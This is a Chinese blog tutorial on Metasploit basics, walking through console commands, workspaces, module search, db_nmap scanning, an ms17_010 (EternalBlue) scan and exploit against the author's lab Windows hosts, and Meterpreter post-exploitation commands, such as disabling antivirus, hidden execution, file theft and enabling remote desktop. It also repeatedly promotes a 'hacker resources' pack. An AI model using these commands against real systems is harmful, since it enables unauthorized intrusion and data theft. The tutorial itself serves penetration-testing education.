必看!Metasploit 基础(auxiliary、exploits、meterpreter)使用全解,渗透测试教程干货满满

metasplit框架

下面metasplit-framework我都会简称为msf,如果使用的是Windows系统,有三种方式可以使用msf

  1. 使用wsl的kali中的msf: 在wsl中安装kali完整版后即可直接使用msf,但wsl的kali因为有些比较底层的命令(添加开机自启服务)导致数据库无法自动启动,需要进行手动启动,如果你想要使用wsl中的msf可以参考我的博客。当前wsl中使用msf会经常碰到各种报错,所以不是很建议使用。

  2. 使用Windows版本的msf: 可以在官网中直接下载安装,添加环境变量后即可使用。但Windows版本中msf配置起来有很多问题,比如我在安装的时候,安装路径就无法改变,无论我选择什么路径,总是默认到我的E盘中,而且还一个很重要的问题就是Windows版本的msf一直存在数据库很难连接的问题,这个问题我也没有解决方案。如果你有一个比较好的解决方案可以在下方的评论区分享。Windows版本官方下载地址: (github.com/rapid7/meta…)PostgreSQL下载地址: www.enterprisedb.com/downloads/p…

  3. 当前对于新手最友好的方案是使用虚拟机中安装的kali带的msf,不会碰到各种稀奇古怪的错误。

msf结构介绍

kali中,msf会默认存储在如下地址中
/usr/share/metasploit-framework
在这里插入图片描述

早期版本也可能存在/opt/metasploit-framework/embedded/framework/目录中。

msf常用目录介绍
data包含metasploit用于存储某些漏洞、单词列表、图像等所需二进制文件的可编辑文件。
documentation包含框架的可用文档。
libmetasploit的库文件夹。
plugins用来存放metasploit的插件。
scripts用来存放metasploit的脚本,包括meterpreter及其它脚本。
tools存放多种的命令行实用程序。
modules存储metasploit的模块文件。
modules目录文件介绍
auxiliary辅助模块,辅助渗透(端口扫描、登录密码爆破、漏洞验证等)
exploits漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。命名规则:操作系统/各种应用协议分类
payloads攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码
post后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令,如:提权等
encoders编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测和过滤系统
evasion躲避模块,用来生成免杀payload
nops空操作模块, 由于IDS/IPS会检查数据包中不规则的数据,在某些情况下,比如针对溢出攻击,某些特殊滑行字符串(NOPS x90x90…)则会因为被拦截而导致攻击失效。

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

在这里插入图片描述

进入msf

如果是用的linux中的msf,首先我们要初始化数据sudo msfdb init,方便之后将一些收集的信息保存起来。

连接msf控制台msfconsole
在这里插入图片描述

首先我们可以看一下是否成功连接数据库db_status如果没有连接数据库,接下来我们的操作大多数都基本是无效的。
在这里插入图片描述

msf常用基础命令

这些命令推荐后面再看,先看一下下面的使用,如果在其中看到不知道干什么的属性,再看这里我介绍的地方会比较好理解。

常用基础命令作用
use类似cd命令,装载msf模块
workspacemsf控制台相关命令
host查看扫描记录
db_nmapnmap命令的msf版本,用法和nmap完全一致。
show 内容查看所有指定模块(比如说show exploits:查找所有攻击模块,show payloads:查找所有攻击载荷等等,如果想看msf中所有的内容可以show all)
search 名称查找msf指定的模块(攻击模块和其他模块都可以利用此命令查找)(比如说我们想查找永恒之蓝漏洞相关利用方法可以输入search ms17)
init(模块内使用) 查看模块具体信息
options(模块内使用) 查看当前模块的常用配置项
advanced(模块内使用) 查看当前模块的详细配置项
set 配置名 配置值(模块内使用) 修改模块配置信息, 比如set rhost 192.168.1.1将目标主机设置为192.168.13.1
unset 配置名(模块内使用) 删除某个模块的配置信息
setg 配置名 配置值(模块内使用) 这种配置和上述set类似,不同的是使用setg的设置会在全局生效(也有unsetg 配置名)
run(模块内使用) 启动模块
back(模块内使用) 退出此模块
save(模块内使用) 保存此模块的配置
sessions进入指定的目标控制台中(当我们成功获取目标主机控制台权限时,目标主机的控制台我们就称为session),输入sessions我们就能看到我们当前有哪些能进入的控制台,输入sessions 序号,既可以进入对应的控制台,更多用法可以通过sessions -h 查看
background(目标控制台内使用) 将目标控制台放入后台运行

进入、管理工作台

工作台workspace是msf类似ide中新建项目的功能,每一个工作台都可以看成是一个独立的项目。其中默认有一个default工作台。
在这里插入图片描述

选项作用
workspace列出工作台列表,(如果没有手动建立,输出为*default)
workspace -v列表工作台的详细信息
workspace [姓名]切换工作台
workspace -a [姓名] …添加工作台(可以一次添加多个工作台)
workspace -d [姓名] …删除工作台(可以一次删除多个工作台)
workspace -D删除所有工作台
workspace -r <旧名称> <新名称>给工作台重命名
workspace -h显示帮助信息

在这里插入图片描述

搜索功能

msf内置的模块太多了,为了方便我们能快速找到想要的模块,需要利用好搜索功能search [选项] [关键词:值]

搜索模块选项作用
search -h显示帮助信息
search -o 文件名以csv格式将输出发送到文件
search -S 正则表达式使用正则表达式匹配搜索
search -u如果搜索结果只有一个,那么直接使用此模块
关键词搜索关键词作用
aka匹配具有指定别称的模块
author寻找指定作者的模块
arch影响此构架的模块
bid寻找匹配Bugtraq ID的模块(BugTraq是一个完整的对计算机安全漏洞(它们是什么,怎样利用它们,以及怎样修补它们)的公告及具体论述进行适度披露的邮件列表)
cve寻找匹配cve ID的模块(公共漏洞和暴露:Common Vulnerabilities & Exposures),将漏洞进行的统一命名。
edb具有匹配的ExploitDB ID的模块(ExploitDB 是一个面向全世界黑客的漏洞提交平台,该平台会公布最新漏洞的相关情况: www.exploit-db.com/)
check支持“check”方法的模块
date寻找指定披露日期内的模块
description寻找具有匹配描述的模块
fullname寻找指定全名的模块(这里全名是必须一一对应的)
name寻找指定名称的模块(这里的名称可以是一部分名称)
mod_time寻找在指定日期修改的模块
path寻找指定路径的模块
platform影响指定平台的模块(Windows、Linux等)
port寻找在指定端口上会使用的模块

还可以使用一些属性搜索,比如我想搜索Windows平台2009年的漏洞,则可以使用:search platform:windows cve:2009 type:exploit

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

信息收集

msf内置了一个nmap模块,这个nmap和我们常规的nmap是一模一样的,只是将nmap缓存了db_namp即可,使用msf的nmap扫描出来后会自动将我们的结果保存进入数据库,方便我们后续查看。
示例1:

db_nmap --script=vuln 192.168.3.5

这里我使用nmap扫描了一下目标主机(xp系统)是否存在常见漏洞,发现了永恒之蓝
在这里插入图片描述

# 使用nmap进行c端扫描
db_nmap 192.168.206.*
# 可以在hosts中查看扫描记录
hosts

使用msf内置的这些信息收集命令后,大部分信息会保存到工作台对应的数据库中,使用hosts就能查看。
在这里插入图片描述

简单使用(测试漏洞为ms17_010)

辅助模块使用(auxiliary)

在msf中,我们可以装载auxiliary/scanner/discovery/arp_sweep模块,来扫描我们的靶机192.168.3.5是否在线

# 装载模块
use auxiliary/scanner/discovery/arp_sweep
# 设置模块(这里设置了一下扫描目标)
set rhosts 192.168.3.5
# 将并发线程改为200,加快扫描速度
set threads 200
# 启动模块
run

如果启动失败则使用在msfconfig前加入sudo进行提权后在尝试
在装载auxiliary/scanner/smb/smb_ms17_010模块,扫描目标主机是否有指定的漏洞存在。

# 装载模块
use auxiliary/scanner/smb/smb_ms17_010
# 设置模块(这里如果每个模块的目标都是一样的,我们可以用setg,这样之后在切换模块时,此配置会被保留下来)
set rhosts 192.168.3.1-10
run

如果成功扫描到目标,会有如下图所示的提示,如果你无法扫到靶机,尝试将防火墙关闭。(我在测试中发现我的一个xp靶机扫不出来,不知道是这个漏洞在xp不适用,还是xp靶机被打了补丁。)
在这里插入图片描述

漏洞利用模块(exploits)
# 切换到ms17的漏洞利用模块
use exploit/windows/smb/ms17_010_psexec
# 小技巧, 使用show options,可以快速查看模块有哪些属性
show options
# 这里我将目标设置为我的Windows7(192.168.3.8)靶机
set rhosts 192.168.3.8
# 执行漏洞攻击
run

在这里插入图片描述

后渗透模块(meterpreter)

Meterpreter是metasploit的后渗透利用工具。基于内存dll注入实现,能够通过创建一个新进程并调用注入的dll来让目标系统运行注入的dll文件,不需要产生木马文件即可实现。在该模式下,攻击者与目标设备中Meterpreter的通信是通过stager套接字实现的。
我们使用ms17_010这个漏洞直接可以获取对方的meterpreter的权限,这算是一个比较高权限了,如果我们获取到了普通的控制台权限,进行一些操作的时候还需要提权。在meterpreter中,我们可以输入一个问号?来查看具体有哪些命令可供我们使用。
在meterpreter中使用shell

# 连接目标主机的控制台
shell
# 修改编码防止乱码
chcp 65001

在这里插入图片描述

很多常用命令行命令在meterpeter中都能使用,比如说(cd,ls,cat,rm.ipconfig,ifconfig等,下面主要介绍一些独有的常用命令)

meterpreter常用命令作用
bg(background的缩写)将当前meterpreter放入后台
shell启动目标主机控制台
quit退出目标主机控制台
sysinfo目标主机系统信息
screenshot屏幕截取
download 目标文件地址 下载接收地址下载目标文件
upload 目标存放地址 上传文件地址上传文件
search 搜索文件名搜索文件 (可以使用参数,比如search -d c: -f *.doc是搜索c盘中所有的.doc文件)
execute 命令执行命令(比如说execute -f cmd.exe -i即为创建可交互(-i)cmd命令行 ),如果想隐藏进程,可以添加-H
getlwd查看本地当前目录(msf运行的主机上当前正在使用的目录)
lcd切换本地目录
getwb查看目标主机目录
cd切换目标主机目录
ls查看目标文件目录列表
rm删除文件
ps查看目标所有进程
getuid查看目标主机当前用户
run killav关闭杀毒软件
run getgui -e启用远程桌面
portfwd add -l 要监听的本地端口 -p 要连接的远程端口 -r <目标IP>添加端口转发

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述
在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:
在这里插入图片描述
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)
在这里插入图片描述

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值